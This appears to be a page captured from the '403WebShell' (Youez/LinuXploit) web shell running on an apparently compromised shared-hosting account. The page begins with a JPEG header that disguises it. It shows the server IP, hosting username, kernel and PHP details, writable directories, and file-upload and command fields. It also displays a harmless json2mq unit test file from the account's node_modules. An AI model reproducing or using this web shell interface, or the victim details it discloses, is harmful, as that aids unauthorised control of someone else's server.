ÿØÿà JPEG ÿþ; 403WebShell
403Webshell
Server IP : 68.65.120.201  /  Your IP : 216.73.216.68
Web Server : LiteSpeed
System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : taxhyuvu ( 2294)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/json2mq/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/json2mq/test/test.js
var should = require('should');
var json2mq = require('../');

describe('json2mq', function () {
  it('should return query string for media type', function () {
    json2mq({screen: true}).should.equal('screen');
  });

  it('should return query string for media type with not', function () {
    json2mq({handheld: false}).should.equal('not handheld');
  });

  it('should return query string for media features', function () {
    json2mq({minWidth: 100, maxWidth: 200}).should.equal('(min-width: 100px) and (max-width: 200px)');
  });

  it('should return query string for media type and media features', function () {
    json2mq({screen: true, minWidth: 100, maxWidth: 200}).should.equal('screen and (min-width: 100px) and (max-width: 200px)');
  });

  it('should add px unit to dimension features', function () {
    json2mq({minWidth: 100, aspectRatio: "3/4"}).should.equal('(min-width: 100px) and (aspect-ratio: 3/4)');
  });

  it('should accept other units for dimension features if passed as string', function () {
    json2mq({minWidth: '10em', aspectRatio: "3/4"}).should.equal('(min-width: 10em) and (aspect-ratio: 3/4)');
  });

  it('should return comma seperated query string for multiple media queries', function () {
    json2mq([
      {minWidth: 100},
      {handheld: true, orientation: 'landscape'}
    ]).should.equal('(min-width: 100px), handheld and (orientation: landscape)');
  });

  it('should only return feature if its value is true', function () {
    json2mq({all: true, monochrome: true}).should.equal('all and monochrome');
  });
});

Youez - 2016 - github.com/yon3zu
LinuXploit